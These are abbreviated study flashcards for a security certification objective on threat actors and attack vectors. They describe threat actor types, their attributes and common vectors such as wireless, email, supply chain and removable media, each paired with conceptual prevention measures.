1.5 - 1.5 Explain different threat actors, vectors, and intelligence sources. Flashcards
Explain different threat actors, vectors, and intelligence sources.
Advanced persistent threat (APT)
-often associated wth Nation State Threat Actors
-well resourced/sophisticated perps engaged in targeted/prolonged net. + sys. intrusion
-infiltrate net. + remain inside undetected to get info over long period of time
-establish persistent access by;
->planting backdoors, creating privileged accts
Prevention
-regular patching
-employee training
-access ctrls
-threat intelligence sharing
Insider threats
-ppl wth legit access who intentionally/unintentionally harm orgs sec. (more than pswd on sticky notes)
-current/former employees, contractors, partners
-financial gain, revenge, ideology, negligence, competitive advantage
-unauthorized data access, data exfiltration, sabotage, sharing sensitive info, introducing malware
-could be malicious insiders or negligent insiders
Prevention
-behavioral assessments
-identify insiders exhibiting unusual behavior
-proper education/training
-policies to identify risky personnel
-proactive monitoring of net. and sys. activity
-usr access ctrls
-data encryption
-implement least privilege
-incidence response plans
(Nation) State actors
-most sophisticated threat actor/wth most resources (labor force, time, $ to finance ongoing attcks)
-govt. sponsored/affiliated groups (govt. ties not always acknowledged)
-to achieve strategic objectives
-> military ctrl, utilities, financial ctrl, national sec., cyber espionage, cyber warfare, economic/political influence
-establish long term presence in compromised nets.
-> ongoing surveillance, gather intel, precursor/complement to conventional military actions
-custom malware/exploits tailored to targets
-can lead to; diplomatic tensions, sanctions, inter nation agreements related to cyber norms/rules of engagement
Prevention
-hard b/c use of false flags, proxies
-advanced threat protection
-attribution efforts
-international cooperation
Hacktivists
-ppl/groups engage in hacking 4 political, social, ideological reasons
-social change, political agenda
-can be sophisticated (DoS, website defacing, release of priv. docs., data leaks)
-limited funding BUT some have fundraising option
-operate anonymously/pseudonyms to conceal identity + avoid legal repercussions
-legal gray area b/c can be ethical protest and illegal hacking so subject to debate
-can lead to data breaches, services disruptions, reputational damage, financial losses
-usually gets media attn + public awareness
Detection
-intrustion detection
-proactive defense
-DDoS mitigation
-incident response plans
-robust sec. measures
Script kiddies
-ppl that use hacking techniques but have limited skills
-rely on preexisting hacking tools/scripts to conduct attcks
-unsophisticated BUT dangerous b/c unaware of consequences of their actions
-can’t cover tracks well, lack financial means
-target low hanging fruit (websites, online forums, poorly secured sys.)
-could be internal/external
-could plant trojans/remote access tools within org.
-often associated wth website defacement attcks
-motivations: curiosity, ego, attention seeking, vandalism, educational opportunity
Criminal syndicates
-prof. criminals motivated by $
-highly sophisticated, profit driven, diversified, widespread activity
-operate internationally
-has financial means
-illegal use of force, fraud, corruption, malware, social engineering, identity theft, CC fraud, sale of stolen data
-funding comes from other illegal acts (gambling, property theft, loan sharking, etc)
-contribute to underground cybercrime economy (sale of hacking tools, services, stolen data)
-money laundering makes them hard to trace
Prevention
-threat intel.
-international cooperation among law enforcement agencies
Hackers
-ppl/groups who use tech skills to gain authorized/unauthorized access to comp. sys., nets, data
-financial gain, curiosity, activism, mal intent, ego, ethical/sec. training (don’t always have mal. intent)
-targets = ppl, govts, critical infra
-three types = authorized, unauthorized, semi authorized
-methods = software vulns, social engineering, phishing, malware, pswd cracking
-impact = data breaches, financial losses, service disruptions, reputational damage 4 vics
Prevention
-regular patching
-usr training
-robust access ctrls
Authorized
-white hat
-ethical hackers/sec. researchers
-good intentions
-work wth consent of sys. owner to improve cybersec.
-pen testers wth permission to attack/test sys.
Unauthorized
-black hat
-mal. activities/intent
-cybercriminals
-4 personal gain, financial profit, steal data, distribute malware
Semi-authorized
-grey hat
-generally don’t have mal. intent
-operates in morally ambiguous area btwn black + white hat hackers
-may hack wthout permission
->expose vulns, may notify affected parties
-doesn’t use vuln./exploit it > stops when they discover vuln.
Shadow IT
-use of unauthorized/unmanaged IT sys., apps, services within org.
->often wthout knowledge/approval from IT
-going rogue/working around internal IT
-employees might do this 4 convenience/more usr friendly to them
-unapproved sys. may lack proper sec. ctrls, updates, compliance wth org policies
-sensitive data could be exposed, mishandled, insecurely stored
-can lead to non compliance wth regulatory reqs/industry standards
->legal + financial penalties
-hard to monitor, secure, manage which makes it difficult to respond to sec. incidents
Prevention
-usr education
-policy enforcement
-provided approved alts
-collaboration btwn IT + end usrs
-usr friendly IT solutions
Competitors
-anticompetitive practices
-industrial espionage
-harm reputation
-gain economic benefits/steal financial info
-steal customer lists, product designs, pricing strats
-trade secrets, intellectual property, etc
-high level of sophistication + significant funding
-tactics = phishing, malware, social engineering, insider threats
Prevention
-data encryption
-access ctrls
-employee training
-threat intel.
Attributes of actors
-helps build better threat profiles + classification sys. to deploy relevant and proactive defenses
-helps asses their intent
Internal/external
Internal
-work on inside (sysadmins, end usrs)
-may not have motive/intent to cause harm
-have legit access = easier to carry out attcks wthout raising suspicion
-motives = financial gain, grievances, idealogical beliefs, etc.
-actions often accidental
Mitigation
-advanced monitoring
-behavior analysis
-employee awareness programs
External
-operate from outside org.
-lack legit access to internal sys. (script kiddies, hacktivists, nation state actors, organized crime)
-resources @ disposal varies
-tech expertise varies
-motives = financial gain, political/ideological agendas, espionage targeting orgs IP/sensitive data
Mitigation
-consider ext. attck surface (net. perimeter safety)
-firewalls
-intrusion detection sys.
-threat intel.
Level of sophistication/capability
-technical ability
-access
-political/social support
-persistence
-financial means
-sophisticated TAs develop custom malware, tactics/techniques, advanced evasion techniques, patient/persistent
-for financial gain, political goal, espionage, ideological goals
Prevention
-requires advanced cybersec. measures
-threat intel.
-continuous monitoring
Resources/funding
-financial backing…helps with…
->access to tech > enhances effectiveness
->establish/maintain sophisticated infra (cmd + control servers, botnets, etc)
->custom development > malware, tools, techniques
->recruitment + retention of skilled hackers, researchers, etc. = expands TAs capabilities
-advanced hacking tools
-zero day exploits
-global reach
Prevention
-invent in cybersec. measures + threat intel.
Intent/motivation
-helps orgs assess risks, tailor defenses, respond effectively
-some accidental, others driven by financial gain/ideological reasons
-could be mal. (sabotage) wth aim to destroy data, steal info…
-insights into why they engage + what they aim to achieve
->financial profit, grievances, curiosity, power/influence
-intent influences tactics, techniques, targets
-competitive advantage
Prevention
-tailor defenses/responses according to intent + motivation
Vectors
-means that threat actors use to obtain access (path they take to execute attcks)
-a lot of work goes into finding vulns.
-delivery mechanisms
-evolve as tech. advances
-encompass range of techniques/strats
-important 4 proper risk analysis + understanding countermeasures
Direct access
-gain access to comp. sys, net., device, etc by physically entering orgs facilities (data center)
-bypassing traditional digital defenses = makes this highly effective
-could modify OS (reset admin pswd quickly)
-attach keylogger, transfer files, DoS, compromise sys., install malware, extract data, compromise sys., modify configs
-easily accessible location
->sitting + working on laptop which is connected to unsecured net. jacks on the wall
-may find unsecured computer terminal, net. device, sys.
-EX: lobby, public areas, customer store
Prevention
-physical sec. measures (access ctrl)
-surveillance
-tamper evident seals
-secure facility design
-restrict unauthorized physical access to critical sys.
-assume perp who is able to physically touch a component will be able to compromise that device
-physical sec. = v important
Wireless
-exploiting vulns. in wireless nets. + comm. tech.
-targets = wifi nets, bluetooth connections, cellular nets., etc.
-gain unauthorized access to wireless nets, intercept data, launch man in the middle, compromise connected devices
-default login creds > modify AP config
-evil twin > perp collects auth. details (on path attck)
-perps don’t need to gain physical access if they’re able to sit in parking lot + access ur orgs. wireless net.
-unsecured/poorly secured wireless nets. = big sec. risk
Mitigation
-strong encryption (WPA3 for wifi)
-disable unncessary wireless services
-use secure pairing methods 4 bluetooth
-conduct reg. net. sec. assessments
-maintain up to date firmware + sec. patches
-monitor net. traffic
-use strong pswds 4 wireless access
-methods used to compromise email accts 4 unauthorized access/conduct mal. activity
-biggest/most successful attck vector
-common exploited vector (phishing, spam, cred stuffing, brute force, pswd resets, email fwding rules, man in the middle, 2fa bypass, actt takeover, etc)
-deliver malware to usr (attch to msg)
-social engineering tactics
-can send mal. emails, steal sensitive data, conduct further attcks
-easy to execute
-can be launched on many usrs simultaneously
-only need to succeed one time
-perp needs login creds of one usr to begin attck
Prevention
-strong email sec. measures
-robust spam filters
-usr training on email sec. best practices
-enable mfa
-use strong/unique pswds
Supply chain
-exploitinig vuln. with org supply chain/3rd party partners to gain unauthorized access + compromise sys. and data
-tamper wth underlying infra (EX: gain access to net. using a vendor)
-malware can modify manufacturing process
-counterfeit net. equipment > install backdoors, malware, vulns. into products b4 they reach end usr
-impersonate trusted suppliers/employees in supply chain
-social engineering, phishing, compromise updates/patch distribution process
-steal sensitive data, IP, trade secrets
-disrupt production/delivery of goods/services
->cause financial losses + reputational damage
Prevention
-rigorous vetting of 3rd party vendors
-implement sec. standards
-conduct reg. audits
-verify software/hardware integrity
-robust incident response plan
Social media
-exploits vuln. in ppl/orgs use of social media platforms
->where u are/when, vacay pics, usr profiling, where u were born, name of school mascot
-compromise sec/social media accts, conduct mal. activity, spread malware + spyware + trojans, identity theft, reputational damage, brand impersonation, data leakage
perps might directly target usrs
-might use in effort to harvest info about usrs
Prevention
-ppl/orgs use strong + unique pswds
-enable 2fa
-educate usrs about social engineering risks
-regularly review priv sttgs on accts
-usr education
Removable media
-using USB/etc. to spread malware
-might distribute in parking lots, airports, public areas in the hope that someone finds it + plugs into comp.
-device triggers malware infection that silently compromises vics comp. + places it under ctrl of the perp